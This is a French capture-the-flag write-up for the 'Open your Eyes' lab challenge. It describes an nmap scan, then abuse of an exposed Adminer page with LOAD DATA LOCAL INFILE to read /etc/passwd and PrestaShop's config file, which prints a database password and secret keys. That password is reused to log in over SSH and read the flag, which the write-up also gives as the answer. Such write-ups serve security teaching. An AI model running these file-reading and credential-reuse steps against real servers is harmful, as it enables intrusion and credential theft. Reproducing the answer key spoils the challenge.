# Write up Open your Eyes

### Consigne :

```
Un de vos amis vient de créer un site web et vous assure qu’il est sécurisé à cent pour cent. 
Prouvez-lui le contraire.

Démarrer un environnement virtuel. Attention, la durée de vie de l'environnement est limitée...
```

### Pièce jointe :

*Néant*

### Serveur :

```
PortailVMS
```

### Points attribués :

```
TODO
```

### Hint : 

```
TODO
```

### Flag :

`fl@g{973d2ca91ec8946a786aa50fbcbf2e41}`

## Solution :

Challenge ESD

Pour résoudre ce challenge on commence par découvrir les ports de la machine :
```bash
nmap 172.102.100.100

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-10 11:42 CET
Nmap scan report for 172.102.100.100
Host is up (0.0032s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
```

On peut se rendre compte que les ports 22 (ssh), 80(http) et 443(https) sont ouverts.

En se rendant sur le site, nous sommes redirigés vers un domaine inexistant *lab.ctf.internal*. 
Je mets à jour mon fichier */etc/hosts* avec l'adresse IP qui m'a été attribuée par le portailVMS :
```
172.102.100.100 lab.ctf.internal
```

On se connecte maintenant sur http://lab.ctf.internal, on peut apercevoir un site *prestashop*.

En réalisant une énumération des fichiers présents sur le serveur (à l'aide de dirb, dirbuster, ...), on peut découvrir un fichier `/adminer.php`.

Le script php *adminer* est un outil utilisé pour administrer des bases de données.

Je me connecte à cette adresse.

Il est possible d'ouvrir la base de données "*test*", et d'y créer une table "*test*":
```sql
CREATE TABLE test.test (line VARCHAR(200));
```

Je tente de lire le contenu d'un fichier arbitraire sur le système, à l'aide de *local_infile*, et en stockant le résultat dans '*test.test*' : 
```sql
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.test FIELDS TERMINATED BY '\n';
```

La requête est correctement exécutée :
```sql
SELECT * FROM test.test;
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
mysql:x:101:102:mysql:/var/lib/mysql:/sbin/nologin
johnny:x:1000:1000:Linux User,,,:/home/johnny:/bin/ash
```

Je constate un compte utilisateur *johnny*.

Je récupère la configuration d'accès à la base de données de *prestashop*, ce fichier est présent dans `app/config.parameters.php` :
```sql
DELETE FROM test.test;
LOAD DATA LOCAL INFILE '/var/www/html/app/config/parameters.php' INTO TABLE test.test FIELDS TERMINATED BY '\n';
SELECT * FROM test.test;
<?php return array (
  'parameters' => 
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'johnny',
    'database_password' => '75cQcLa9B3mF',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'epmeR15I97RiWxCRqRZPWYCY24LUU9pJb1IS2TCnxLIVkYbFH9QCpf4n',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2020-09-07',
    'locale' => 'fr-FR',
    'use_debug_toolbar' => true,
    'cookie_key' => '4iYx2OmgTZeuhFMW2bIqzkbHtMcVV05DCKNIM8tTy4LzrypPCrAEq5Sq',
    'cookie_iv' => '5pE0pdaf',
    'new_cookie_key' => 'def00000778473b00b8baf1e32ace632c62555838fea606a015858d0065f2f93fb0606f12567f4af93450e3b1f41f7657d4689002a4be4bd385c4ad34ca2762b637bd4bd',
  ),
);
```


On a trouvé le mot de passe d'accès à la base de données. Je vais essayer de me connecter en ssh en utilisant cet identifiant et ce mot de passe (on a vu que le compte utilisateur *johnny* existe bien sur cette machine) :
```bash
ssh johnny@172.102.100.100
johnny@172.102.100.100's password: 

open-your-eyes:~$
```

J'arrive à me connecter avec ce couple identifiant:mot de passe :-)

```bash
open-your-eyes:~$ ls -l
total 4
-rw-r-----    1 root     johnny          39 Mar 10 12:50 flag.txt
open-your-eyes:~$ cat flag.txt
fl@g{973d2ca91ec8946a786aa50fbcbf2e41}
```

J'ai le flag :-)


<!-- Ok F : 20220422 -->